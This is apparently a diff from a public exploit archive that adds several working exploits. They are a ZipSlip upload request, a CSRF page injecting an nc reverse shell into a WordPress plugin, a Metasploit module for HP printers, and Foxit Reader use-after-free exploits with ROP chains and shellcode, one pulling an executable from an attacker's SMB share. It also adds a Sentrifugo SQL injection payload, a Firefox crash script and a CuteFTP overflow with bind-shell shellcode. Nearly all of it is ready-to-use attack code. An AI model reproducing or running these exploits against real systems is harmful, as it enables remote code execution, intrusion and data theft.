Referer: http://192.168.5.129/filemanager/dialog.php?type=0&lang=en_EN&popup=1&crossdomain=0&relative_url=0&akey=key&fldr=&5b6d9b91535a9&1533909952983
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 16
Cookie: last_position=%2F; PHPSESSID=na248cef3f937mtql67dvu8fk5
Connection: close
path=exploit.zip
Bases64-encoded example of exploit.zip which creates source.txt in /tmp/ directory:
UEsDBBQAAAAAALZNmkR7I19kDgAAAA4AAAAmAAAALi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vdG1w
L3NvdXJjZS50eHR1cGxvYWRzIGZvbGRlclBLAQIUAxQAAAAAALZNmkR7I19kDgAAAA4AAAAmAAAA
AAAAAAAAAADtgQAAAAAuLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi90bXAvc291cmNlLnR4dFBLBQYA
AAAAAQABAFQAAABSAAAAAAA=
It is possible to create archives containing ../../ as a part of a file path, now it's famous as ZipSlip vulnerability, but it's an old bug.
It is impossible to upload .php files or .htaccess file using this method, but itas possible to create different files with "legal" extensions on a system and it may lead to remote code execution if a server runs with enough privileges, for example, to create cron jobs.

56
exploits/php/webapps/45274.html Normal file
View file

@ -0,0 +1,56 @@
<!--
About:
===========
Component: Plainview Activity Monitor (Wordpress plugin)
Vulnerable version: 20161228 and possibly prior
Fixed version: 20180826
CVE-ID: CVE-2018-15877
CWE-ID: CWE-78
Author:
- LydA(c)ric Lefebvre (https://www.linkedin.com/in/lydericlefebvre)
Timeline:
===========
- 2018/08/25: Vulnerability found
- 2018/08/25: CVE-ID request
- 2018/08/26: Reported to developer
- 2018/08/26: Fixed version
- 2018/08/26: Advisory published on GitHub
- 2018/08/26: Advisory sent to bugtraq mailing list
Description:
===========
Plainview Activity Monitor Wordpress plugin is vulnerable to OS
command injection which allows an attacker to remotely execute
commands on underlying system. Application passes unsafe user supplied
data to ip parameter into activities_overview.php.
Privileges are required in order to exploit this vulnerability, but
this plugin version is also vulnerable to CSRF attack and Reflected
XSS. Combined, these three vulnerabilities can lead to Remote Command
Execution just with an admin click on a malicious link.
References:
===========
https://github.com/aas-n/CVE/blob/master/CVE-2018-15877/
PoC:
-->
<html>
<!-- Wordpress Plainview Activity Monitor RCE
[+] Version: 20161228 and possibly prior
[+] Description: Combine OS Commanding and CSRF to get reverse shell
[+] Author: LydA(c)ric LEFEBVRE
[+] CVE-ID: CVE-2018-15877
[+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell
[+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well
-->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
<input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" />
<input type="hidden" name="lookup" value="Lookup" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

193
exploits/unix/remote/45273.rb Executable file
View file

@ -0,0 +1,193 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require "rex/proto/pjl"
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::SNMPClient
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'HP Jetdirect Path Traversal Arbitrary Code Execution',
'Description' => %q{
The module exploits a path traversal via Jetdirect to gain arbitrary code execution by
writing a shell script that is loaded on startup to /etc/profile.d. Then, the printer
is restarted using SNMP. Impacted printers:
HP PageWide Managed MFP P57750dw
HP PageWide Managed P55250dw
HP PageWide Pro MFP 577z
HP PageWide Pro 552dw
HP PageWide Pro MFP 577dw
HP PageWide Pro MFP 477dw
HP PageWide Pro 452dw
HP PageWide Pro MFP 477dn
HP PageWide Pro 452dn
HP PageWide MFP 377dw
HP PageWide 352dw
HP OfficeJet Pro 8730 All-in-One Printer
HP OfficeJet Pro 8740 All-in-One Printer
HP OfficeJet Pro 8210 Printer
HP OfficeJet Pro 8216 Printer
HP OfficeJet Pro 8218 Printer
Please read the module documentation regarding the possibility for leaving an
unauthenticated telnetd service running as a side effect of this exploit.
},
'Author' => [
'Jacob Baines', # Python PoC
'Matthew Kienow <matthew_kienow[AT]rapid7.com>', # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2017-2741' ],
[ 'URL', 'https://support.hp.com/lt-en/document/c05462914' ],
[ 'URL', 'http://tenable.com/blog/rooting-a-printer-from-security-bulletin-to-remote-code-execution' ]
],
'Targets' => [
['Unix (In-Memory)',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' => {
'Compat' => {
'PayloadType' => 'cmd'
}
},
]
],
'Privileged' => true,
'DisclosureDate' => 'Apr 05 2017',
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/bind_busybox_telnetd',
'WfsDelay' => 180
}
))
register_options(
[
Opt::RPORT(Rex::Proto::PJL::DEFAULT_PORT),
OptPort.new('SNMPPORT', [true, 'The SNMP port', 161])
]
)
end
def execute_command(cmd, opts = {})
rpath = '0:/../../rw/var/etc/profile.d/'
stager_script_name = opts[:stager_script_name]
cmd = "(cd / && #{cmd}); rm -f /etc/profile.d/#{stager_script_name}"
begin
# use PJL to write command stager
print_status("Connecting to port #{rport}...")
pjl = Rex::Proto::PJL::Client.new(sock)
pjl.begin_job
pjl.fsinit(rpath[0..1])
print_status("Attempting to write command stager...")
rpath = "#{rpath}#{stager_script_name}"
if pjl.fsdownload(cmd, rpath, is_file: false)
print_good("Successfully wrote command stager to #{rpath}")
else
print_error("Failed to write command stager to #{rpath}")
return
end
# verify command stager exists
unless pjl.fsquery(rpath)
print_error("Command stager does not exist at #{rpath}; aborting...")
return
end
pjl.end_job
rescue Rex::ConnectionError
print_error("Connection Refused")
raise
end
end
def restart_printer
pjl_port = datastore['RPORT']
snmp_port = datastore['SNMPPORT']
community = datastore['COMMUNITY']
# Printer MIB prtGeneralReset object identifier (numeric notation)
prt_general_reset = '1.3.6.1.2.1.43.5.1.1.3.1'
# prtGeneralReset powerCycleReset(4) value
power_cycle_reset = 4
begin
# TODO: Update when there is a clean approach to using two or more mixins that both use RPORT.
datastore['RPORT'] = snmp_port
print_status("Connecting to SNMP port #{rport}...")
snmp = connect_snmp
# get value of Printer MIB prtGeneralReset
reset_value = snmp.get_value(prt_general_reset)
reset_value = "''" if reset_value.is_a?(SNMP::Null)
print_status("Initial value of prtGeneralReset OID #{prt_general_reset} => #{reset_value}")
# set value of Printer MIB prtGeneralReset to powerCycleReset(4)
print_status("Attempting to restart printer via SNMP...")
varbind = SNMP::VarBind.new(prt_general_reset, SNMP::Integer.new(power_cycle_reset))
response = snmp.set(varbind)
if response.error_status == :noError
print_status("Set prtGeneralReset OID #{prt_general_reset} => #{power_cycle_reset}")
# get value of Printer MIB prtGeneralReset
reset_value = snmp.get_value(prt_general_reset)
reset_value = "''" if reset_value.is_a?(SNMP::Null)
print_status("Current value of prtGeneralReset OID #{prt_general_reset} => #{reset_value}")
print_status("Printer restarting...")
else
print_error("Unable to set prtGeneralReset; SNMP response error status: #{response.error_status}")
end
rescue SNMP::RequestTimeout
print_error("SNMP request timeout with community '#{community}'")
raise
rescue SNMP::UnsupportedVersion
print_error("Unsupported SNMP version specified; use '1' or '2c'")
raise
rescue Rex::ConnectionError
print_error("Connection Refused")
raise
ensure
# restore original rport value
datastore['RPORT'] = pjl_port
end
end
def exploit
begin
opts = {
stager_script_name: "#{Rex::Text.rand_text_alpha(8)}.sh"
}
print_status("Exploiting...")
connect
if target.name =~ /Unix/
execute_command(payload.encoded, opts)
else
execute_cmdstager(opts)
end
restart_printer
return
ensure
disconnect
end
end
end

256
exploits/windows/local/45163.txt Normal file
View file

@ -0,0 +1,256 @@
%PDF
1 0 obj
<</Pages 1 0 R /OpenAction 2 0 R>>
2 0 obj
<</S /JavaScript /JS (
/*
# Exploit Title: Foxit Reader 9.0.1.1049 - Buffer Overflow (ASLR)(DEP)
# Date: 2018-08-04
# Exploit Author: Manoj Ahuje
# Tested on: Windows 7 Pro (x32)
# Software Link: https://www.foxitsoftware.com/downloads/latest.php?product=Foxit-Reader&platform=Windows&version=9.0.1.1049&package_type=exe&language=English
# Version: Foxit Reader 9.0.1.1049
# CVE: N/A
# Credits to "Mr_Me" for Reseach and initial exploit
#Details:
#This exploit make use heap space to store the shellcode in addition to UAF bypassing ASLR and DEP to get successful payload execution
*/
var heap_ptr = 0;
var foxit_base = 0;
function heap_spray(size){
var arr = new Array(size);
for (var i = 0; i < arr.length; i++) {
// re-claim and stack pivot-0x8
arr[i] = new ArrayBuffer(0x10000-0x8);//0xFFF8
var claimed = new Int32Array(arr[i]);
var c_length = claimed.length;
/* custom made ROP chain virtualalloc call
Author: Manoj Ahuje */
claimed[0x00] = foxit_base + 0x01A65184; //# PUSH EAX # POP ESP # POP EDI # POP ESI # POP EBX # POP EBP # RETN
claimed[0x01] = foxit_base + 0x01A65184;
claimed[0x02] = foxit_base + 0x01A65184;
claimed[0x03] = foxit_base + 0x01A65184;
claimed[0x04] = foxit_base + 0x14f9195; // # POP EBX # RETN
claimed[0x05] = foxit_base + 0x41414141; //
claimed[0x06] = foxit_base + 0x1f224fc; // # ptr to &VirtualProtect()
claimed[0x07] = foxit_base + 0x0e70281; // # MOV ESI,DWORD PTR DS:[EBX] # RETN
claimed[0x08] = foxit_base + 0x1582698; // # POP EBP # RETN
claimed[0x09] = foxit_base + 0xa0dbd; // # & jmp esp
claimed[0x0a] = foxit_base + 0x14ed06d; // # POP EBX # RETN
claimed[0x0b] = 0x00000201; // # 0x00000201-> ebx
claimed[0x0c] = foxit_base + 0x1e62f7e; // # POP EDX # RETN
claimed[0x0d] = 0x00000040; // # 0x00000040-> edx
claimed[0x0e] = foxit_base + 0x1ec06a9; // # POP ECX # RETN
claimed[0x0f] = foxit_base + 0x29bac74; // # &Writable location
claimed[0x10] = foxit_base + 0xb971f; // # POP EDI # RETN
claimed[0x11] = foxit_base + 0x177769e; // # RETN (ROP NOP)
claimed[0x12] = foxit_base + 0x1A89808; // # POP EAX # RETN
claimed[0x13] = 0x90909090; // # nop
claimed[0x14] = foxit_base + 0x129d4f0; // # PUSHAD # RETN
claimed[0x15] = 0x90909090;
claimed[0x16] = 0x90909090;
claimed[0x17] = 0x90909090;
claimed[0x18] = 0x90909090;
claimed[0x19] = 0x90909090;
claimed[0x1a] = 0x90909090;
//regular CALCULATOR shellcode
claimed[0x1b] = 0xe5d9e389;
claimed[0x1c] = 0x5af473d9;
claimed[0x1d] = 0x4a4a4a4a;
claimed[0x1e] = 0x4a4a4a4a;
claimed[0x1f] = 0x434a4a4a;
claimed[0x20] = 0x43434343;
claimed[0x21] = 0x59523743;
claimed[0x22] = 0x5058416a;
claimed[0x23] = 0x41304130;
claimed[0x24] = 0x5141416b;
claimed[0x25] = 0x32424132;
claimed[0x26] = 0x42304242;
claimed[0x27] = 0x58424142;
claimed[0x28] = 0x42413850;
claimed[0x29] = 0x49494a75;
claimed[0x2a] = 0x4e586b6c;
claimed[0x2b] = 0x57306362;
claimed[0x2c] = 0x53707770;
claimed[0x2d] = 0x6b696e50;
claimed[0x2e] = 0x39716455;
claimed[0x2f] = 0x6e645050;
claimed[0x30] = 0x6470426b;
claimed[0x31] = 0x434b6c70;
claimed[0x32] = 0x6e6c3662;
claimed[0x33] = 0x7562436b;
claimed[0x34] = 0x526b6e44;
claimed[0x35] = 0x46686452;
claimed[0x36] = 0x5037386f;
claimed[0x37] = 0x6446764a;
claimed[0x38] = 0x4e4f4b71;
claimed[0x39] = 0x354c774c;
claimed[0x3a] = 0x776c6131;
claimed[0x3b] = 0x374c7672;
claimed[0x3c] = 0x5a614a50;
claimed[0x3d] = 0x374d746f;
claimed[0x3e] = 0x38573971;
claimed[0x3f] = 0x30525a62;
claimed[0x40] = 0x6e376652;
claimed[0x41] = 0x6252506b;
claimed[0x42] = 0x624b6c30;
claimed[0x43] = 0x6c4c576a;
claimed[0x44] = 0x476c524b;
claimed[0x45] = 0x6d387461;
claimed[0x46] = 0x43587133;
claimed[0x47] = 0x50513831;
claimed[0x48] = 0x334b6c51;
claimed[0x49] = 0x35506769;
claimed[0x4a] = 0x6e534851;
claimed[0x4b] = 0x7539576b;
claimed[0x4c] = 0x54736948;
claimed[0x4d] = 0x4e79637a;
claimed[0x4e] = 0x6c64356b;
claimed[0x4f] = 0x6a51354b;
claimed[0x50] = 0x39514676;
claimed[0x51] = 0x6f4c6e6f;
claimed[0x52] = 0x444f4831;
claimed[0x53] = 0x4861364d;
claimed[0x54] = 0x6b783447;
claimed[0x55] = 0x69357450;
claimed[0x56] = 0x73337366;
claimed[0x57] = 0x5568494d;
claimed[0x58] = 0x474d436b;
claimed[0x59] = 0x68357454;
claimed[0x5a] = 0x4e686364;
claimed[0x5b] = 0x6638466b;
claimed[0x5c] = 0x59313344;
claimed[0x5d] = 0x6c766143;
claimed[0x5e] = 0x506c664b;
claimed[0x5f] = 0x504b4c4b;
claimed[0x60] = 0x656c4758;
claimed[0x61] = 0x6c436951;
claimed[0x62] = 0x6e34634b;
claimed[0x63] = 0x6831436b;
claimed[0x64] = 0x61694e50;
claimed[0x65] = 0x65746554;
claimed[0x66] = 0x514b5174;
claimed[0x67] = 0x7351734b;
claimed[0x68] = 0x427a6269;
claimed[0x69] = 0x396f6971;
claimed[0x6a] = 0x734f5170;
claimed[0x6b] = 0x4e6a436f;
claimed[0x6c] = 0x7832526b;
claimed[0x6d] = 0x316d4e6b;
claimed[0x6e] = 0x675a534d;
claimed[0x6f] = 0x4f4d6c71;
claimed[0x70] = 0x57324875;
claimed[0x71] = 0x43707770;
claimed[0x72] = 0x61306630;
claimed[0x73] = 0x6e514678;
claimed[0x74] = 0x6e6f706b;
claimed[0x75] = 0x6b6f5967;
claimed[0x76] = 0x784b4f65;
claimed[0x77] = 0x39656d70;
claimed[0x78] = 0x73565032;
claimed[0x79] = 0x6c666c58;
claimed[0x7a] = 0x6d6d4d55;
claimed[0x7b] = 0x496f494d;
claimed[0x7c] = 0x456c6545;
claimed[0x7d] = 0x454c7356;
claimed[0x7e] = 0x6b306b5a;
claimed[0x7f] = 0x5370394b;
claimed[0x80] = 0x4d453445;
claimed[0x81] = 0x6567426b;
claimed[0x82] = 0x70426343;
claimed[0x83] = 0x376a506f;
claimed[0x84] = 0x6b336670;
claimed[0x85] = 0x3045694f;
claimed[0x86] = 0x72313563;
claimed[0x87] = 0x7633654c;
claimed[0x88] = 0x4235754e;
claimed[0x89] = 0x67354558;
claimed[0x8a] = 0x00414170;
for (var j = 0x8b; j < c_length; j++) {
claimed[j] = 0x6d616e6a;
}
}
}
function leak(){
/*
Foxit Reader Typed Array Uninitialized Pointer Information Disclosure Vulnerability
ZDI-CAN-5380 / ZDI-18-332 / CVE-2018-9948
Found By: bit from meepwn team
*/
// alloc
var a = this.addAnnot({type: "Text"});
// free
a.destroy();
// reclaim
var test = new ArrayBuffer(0x60);
var stolen = new Int32Array(test);
// leak the vftable
var leaked = stolen[0] & 0xffff0000;
// a hard coded offset to FoxitReader.exe base v9.0.1.1049 (sha1: a01a5bde0699abda8294d73544a1ec6b4115fa68)
foxit_base = leaked-0x01f50000;
}
function reclaim(){
var arr = new Array(0x10);
for (var i = 0; i < arr.length; i++) {
arr[i] = new ArrayBuffer(0x60);
var rop = new Int32Array(arr[i]);
rop[0x00] = 0x11000048;
for (var j = 0x01; j < rop.length; j++) {
rop[j] = 0x71727374;
}
}
}
function trigger_uaf(){
/*
Foxit Reader Text Annotations point Use-After-Free Remote Code Execution Vulnerability
ZDI-CAN-5620 / ZDI-18-342 / CVE-2018-9958
Found By: Steven Seeley (mr_me) of Source Incite
*/
var that = this;
var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
var arr = [1];
Object.defineProperties(arr,{
"0":{
get: function () {
// free
that.getAnnot(0, "uaf").destroy();
// reclaim freed memory
reclaim();
return 1;
}
}
});
a.point = arr;
}
leak();
heap_spray(0x1000);
trigger_uaf();
)>> trailer <</Root 1 0 R>>

218
exploits/windows/local/45269.rb Executable file
View file

@ -0,0 +1,218 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info={})
super(update_info(info,
'Name' => 'Foxit PDF Reader Pointer Overwrite UAF',
'Description' => %q{
Foxit PDF Reader v9.0.1.1049 has a Use-After-Free vulnerability
in the Text Annotations component and the TypedArray's use
uninitialized pointers.
The vulnerabilities can be combined to leak a vtable memory address,
which can be adjusted to point to the base address of the executable.
A ROP chain can be constructed that will execute when Foxit Reader
performs the UAF.
},
'License' => MSF_LICENSE,
'Author' =>
[
'mr_me', # Use-after-free and PoC
'bit from meepwn', # Uninitialized pointer
'saelo', # JavaScript Garbage Collector
'Jacob Robles' # Metasploit Module
],
'References' =>
[
['CVE', '2018-9948'],
['CVE', '2018-9958'],
['ZDI', '18-332'],
['ZDI', '18-342'],
['URL', 'https://srcincite.io/blog/2018/06/22/foxes-among-us-foxit-reader-vulnerability-discovery-and-exploitation.html'],
['URL', 'https://srcincite.io/pocs/cve-2018-99{48,58}.pdf.txt']
],
'DefaultOptions' =>
{
'DisablePayloadHandler' => true,
'FILENAME' => 'test.pdf',
'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
},
'Platform' => 'win',
'Targets' =>
[
['Windows 10 Pro x64 Build 17134', {}]
],
'DisclosureDate' => 'Apr 20 2018',
'DefaultTarget' => 0))
register_options([
OptString.new('EXENAME', [false, 'EXE file to download', '']),
OptString.new('SHARE', [false, 'SMB share hosting exe', ''])
])
end
def pdfdoc
share = datastore['SHARE'].empty? ? "#{Rex::Text.rand_text_alpha_lower(1)}" : datastore['SHARE']
fname = datastore['EXENAME'].empty? ? "#{Rex::Text.rand_text_alpha_lower(1)}.exe" : datastore['EXENAME']
fname << '.exe' unless fname.ends_with?('.exe')
share_path = "\\\\#{datastore['LHOST']}\\#{share}\\#{fname}"
num = 4 - (share_path.length % 4)
share_path << "\x00"*num
return nil if share_path.length > 44
print_status("share_path: #{share_path}")
rop = ''
max_index = 0
share_path.unpack('V*').each_with_index {|blk, index|
rop << "\nrop[0x%02x] = 0x%08x" % [index+12, blk]
max_index = index
}
(max_index+1).upto(10) {|i| rop << "\nrop[0x%02x] = 0x00000000" % (i+12)}
<<~PDFDOC
%PDF
1 0 obj
<</Pages 1 0 R /OpenAction 2 0 R>>
2 0 obj
<</S /JavaScript /JS (
var heap_ptr = 0;
var foxit_base = 0;
var pwn_array = [];
function prepare_heap(size){
var arr = new Array(size);
for(var i = 0; i < size; i++){
arr[i] = this.addAnnot({type: "Text"});;
if (typeof arr[i] == "object"){
arr[i].destroy();
}
}
}
function gc() {
const maxMallocBytes = 128 * 0x100000;
for (var i = 0; i < 3; i++) {
var x = new ArrayBuffer(maxMallocBytes);
}
}
function alloc_at_leak(){
for (var i = 0; i < 0x64; i++){
pwn_array[i] = new Int32Array(new ArrayBuffer(0x40));
}
}
function control_memory(){
for (var i = 0; i < 0x64; i++){
for (var j = 0; j < pwn_array[i].length; j++){
pwn_array[i][j] = foxit_base + 0x01a7ee23; // push ecx; pop esp; pop ebp; ret 4
}
}
}
function leak_vtable(){
var a = this.addAnnot({type: "Text"});
a.destroy();
gc();
prepare_heap(0x400);
var test = new ArrayBuffer(0x60);
var stolen = new Int32Array(test);
var leaked = stolen[0] & 0xffff0000;
foxit_base = leaked - 0x01f50000;
}
function leak_heap_chunk(){
var a = this.addAnnot({type: "Text"});
a.destroy();
prepare_heap(0x400);
var test = new ArrayBuffer(0x60);
var stolen = new Int32Array(test);
alloc_at_leak();
heap_ptr = stolen[1];
}
function reclaim(){
var arr = new Array(0x10);
for (var i = 0; i < arr.length; i++) {
arr[i] = new ArrayBuffer(0x60);
var rop = new Int32Array(arr[i]);
rop[0x00] = heap_ptr; // pointer to our stack pivot from the TypedArray leak
rop[0x01] = foxit_base + 0x01a11d09; // xor ebx,ebx; or [eax],eax; ret
rop[0x02] = 0x72727272; // junk
rop[0x03] = foxit_base + 0x00001450 // pop ebp; ret
rop[0x04] = 0xffffffff; // ret of WinExec
rop[0x05] = foxit_base + 0x0069a802; // pop eax; ret
rop[0x06] = foxit_base + 0x01f2257c; // IAT WinExec
rop[0x07] = foxit_base + 0x0000c6c0; // mov eax,[eax]; ret
rop[0x08] = foxit_base + 0x00049d4e; // xchg esi,eax; ret
rop[0x09] = foxit_base + 0x00025cd6; // pop edi; ret
rop[0x0a] = foxit_base + 0x0041c6ca; // ret
rop[0x0b] = foxit_base + 0x000254fc; // pushad; ret
#{rop}
rop[0x17] = 0x00000000; // adios, amigo
}
}
function trigger_uaf(){
var that = this;
var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
var arr = [1];
Object.defineProperties(arr,{
"0":{
get: function () {
that.getAnnot(0, "uaf").destroy();
reclaim();
return 1;
}
}
});
a.point = arr;
}
function main(){
leak_heap_chunk();
leak_vtable();
control_memory();
trigger_uaf();
}
if (app.platform == "WIN"){
if (app.isFoxit == "Foxit Reader"){
if (app.appFoxitVersion == "9.0.1.1049"){
main();
}
}
}
)>> trailer <</Root 1 0 R>>
PDFDOC
end
def exploit
mypdf = pdfdoc
if mypdf.nil?
fail_with(Failure::BadConfig, 'The generated share path was greater than 44 bytes.')
end
file_create(mypdf)
end
end

64
exploits/windows/webapps/45266.txt Normal file
View file

@ -0,0 +1,64 @@
# Exploit Title: Sentrifugo HRMS 3.2 - 'deptid' SQL Injection
# Exploit Author: Javier Olmedo
# Website: https://hackpuntes.com
# Date: 2018-08-26
# Google Dork: N/A
# Vendor: http://www.sapplica.com
# Software Link: http://www.sentrifugo.com/download
# Affected Version: 3.2 and possibly before
# Patched Version: unpatched
# Category: Web Application
# Platform: PHP
# Tested on: Win10x64 & Kali Linux
# CVE: N/A
# 1. Technical Description:
# Sentrifugo HRMS version 3.2 and possibly before are affected by Blind SQL Injection in deptid
# parameter through POST request in "/index.php/servicedeskconf/getemployees/format/html" resource.
# This allows a user of the application without permissions to read sensitive information from
# the database used by the application.
# 2. Proof Of Concept (PoC):
# 2.1 The following POST request generates an error 500 in the Application (add ' in deptid parameter)
POST /sentrifugo/index.php/servicedeskconf/getemployees/format/html HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html, */*; q=0.01
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/sentrifugo/index.php/servicedeskconf/add
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 28
Cookie: PHPSESSID=25kchrvj0e3akklgh0inrubqu0
Connection: close
bunitid=0&deptid='&reqfor=2
# 2.2 In another request, add two ' to receive a code 200 OK
POST /sentrifugo/index.php/servicedeskconf/getemployees/format/html HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html, */*; q=0.01
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/sentrifugo/index.php/servicedeskconf/add
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 28
Cookie: PHPSESSID=25kchrvj0e3akklgh0inrubqu0
Connection: close
bunitid=0&deptid=''&reqfor=2
# 3. Payload:
Parameter: deptid (POST)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: bunitid=0&deptid=(SELECT (CASE WHEN (5610=5610) THEN 5610 ELSE 5610*(SELECT 5610 FROM INFORMATION_SCHEMA.PLUGINS) END))&reqfor=2
# 4. Reference:
# https://hackpuntes.com/cve-2018-15873-sentrifugo-hrms-3-2-blind-sql-injection/

27
exploits/windows_x86-64/dos/45257.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: Firefox 55.0.3 - Denial of Service (PoC)
# Date: 2018-08-26
# Exploit Author: L0RD
# Vendor Homepage: mozilla.org
# Software Link: https://www.mozilla.org/en-US/firefox/55.0.3/releasenotes/
# Version: 55.0.3
# Tested on: Windows 10
# CVE: N/A
# Description :
# An issue was discovered in firefox 55.0.3 which an attacker can create a
# webpage and put javascript payload to crash user's browser or put user in
# non-responsive state.
# Exploit :
/* We don't need to create any element on webpage.we just set body
attribute with our buffer variable*/
<script>
var buffer = "";
for(var i=0;i<0x11170;i++){
for(j=0;j<=0x9C40;j++){
buffer += "\x44";
}
}
document.body.style.backgroundColor = buffer;
</script>

63
exploits/windows_x86/local/45259.py Executable file
View file

@ -0,0 +1,63 @@
# Exploit Title: CuteFTP 5.0 - Buffer Overflow
# Author: Matteo Malvica
# Date: 2018-08-26
# Vendor homepage: www.globalscape.com
# Software: CuteFTP 5.0.4 XP - build 54.8.6.1
# Software Link: http://installer.globalscape.com/pub/cuteftp/archive/english/cuteftp50.exe
# Tested on: Windows XP Profesional SP3 English x86
# STEPS:
# 1. The python script will generate an 'exploit.txt' file.
# 2. Start CuteFTP
# 3. In the program menu click "File" > "Site Manager" > "New" and paste the content of
# the exploit file into the 'label' field and provide a dummy IP addresss.
# 4. Right click on the site name and 'create shortcut'
# 5. Rename the shortcut to whatever name you prefer: this will create an exe that automates exploit loading upon clicking.
# 6. Quit CuteFTP and launch the newly created 'shortcut'.exe
# 7. $ nc [target_ip] 6666
# 8. celebrate moderately
ret="\xD8\xFC\x91\x7C" #ntdll.dll 7C91FCD8
nops = '\x90'*30
#msfvenom -p windows/shell_bind_tcp LPORT=6666 -b '\x0a\x00\x0d' -f python
sc = ""
sc += "\xdb\xd8\xb8\xa7\x37\x29\x0e\xd9\x74\x24\xf4\x5b\x33"
sc += "\xc9\xb1\x53\x31\x43\x17\x83\xeb\xfc\x03\xe4\x24\xcb"
sc += "\xfb\x16\xa2\x89\x04\xe6\x33\xee\x8d\x03\x02\x2e\xe9"
sc += "\x40\x35\x9e\x79\x04\xba\x55\x2f\xbc\x49\x1b\xf8\xb3"
sc += "\xfa\x96\xde\xfa\xfb\x8b\x23\x9d\x7f\xd6\x77\x7d\x41"
sc += "\x19\x8a\x7c\x86\x44\x67\x2c\x5f\x02\xda\xc0\xd4\x5e"
sc += "\xe7\x6b\xa6\x4f\x6f\x88\x7f\x71\x5e\x1f\x0b\x28\x40"
sc += "\x9e\xd8\x40\xc9\xb8\x3d\x6c\x83\x33\xf5\x1a\x12\x95"
sc += "\xc7\xe3\xb9\xd8\xe7\x11\xc3\x1d\xcf\xc9\xb6\x57\x33"
sc += "\x77\xc1\xac\x49\xa3\x44\x36\xe9\x20\xfe\x92\x0b\xe4"
sc += "\x99\x51\x07\x41\xed\x3d\x04\x54\x22\x36\x30\xdd\xc5"
sc += "\x98\xb0\xa5\xe1\x3c\x98\x7e\x8b\x65\x44\xd0\xb4\x75"
sc += "\x27\x8d\x10\xfe\xca\xda\x28\x5d\x83\x2f\x01\x5d\x53"
sc += "\x38\x12\x2e\x61\xe7\x88\xb8\xc9\x60\x17\x3f\x2d\x5b"
sc += "\xef\xaf\xd0\x64\x10\xe6\x16\x30\x40\x90\xbf\x39\x0b"
sc += "\x60\x3f\xec\xa6\x68\xe6\x5f\xd5\x95\x58\x30\x59\x35"
sc += "\x31\x5a\x56\x6a\x21\x65\xbc\x03\xca\x98\x3f\x31\x01"
sc += "\x14\xd9\x2f\x05\x70\x71\xc7\xe7\xa7\x4a\x70\x17\x82"
sc += "\xe2\x16\x50\xc4\x35\x19\x61\xc2\x11\x8d\xea\x01\xa6"
sc += "\xac\xec\x0f\x8e\xb9\x7b\xc5\x5f\x88\x1a\xda\x75\x7a"
sc += "\xbe\x49\x12\x7a\xc9\x71\x8d\x2d\x9e\x44\xc4\xbb\x32"
sc += "\xfe\x7e\xd9\xce\x66\xb8\x59\x15\x5b\x47\x60\xd8\xe7"
sc += "\x63\x72\x24\xe7\x2f\x26\xf8\xbe\xf9\x90\xbe\x68\x48"
sc += "\x4a\x69\xc6\x02\x1a\xec\x24\x95\x5c\xf1\x60\x63\x80"
sc += "\x40\xdd\x32\xbf\x6d\x89\xb2\xb8\x93\x29\x3c\x13\x10"
sc += "\x59\x77\x39\x31\xf2\xde\xa8\x03\x9f\xe0\x07\x47\xa6"
sc += "\x62\xad\x38\x5d\x7a\xc4\x3d\x19\x3c\x35\x4c\x32\xa9"
sc += "\x39\xe3\x33\xf8"
buffer = "A" * 520+ ret + nops + sc + "C" * (3572 - len(sc))
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s recreational bytes..." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

28
files_exploits.csv
View file

@ -6067,6 +6067,10 @@ id,file,description,date,author,type,platform,port
45246,exploits/windows_x86-64/dos/45246.py,"CuteFTP 8.3.1 - Denial of Service (PoC)",2018-08-23,"Ali Alipour",dos,windows_x86-64,
45249,exploits/linux/dos/45249.txt,"Epiphany Web Browser 3.28.1 - Denial of Service (PoC)",2018-08-23,"Dhiraj Mishra",dos,linux,
45251,exploits/windows_x86-64/dos/45251.py,"SkypeApp 12.8.487.0 - 'Cuenta de Skype o Microsoft' Denial of Service (PoC)",2018-08-24,"Luis Martínez",dos,windows_x86-64,
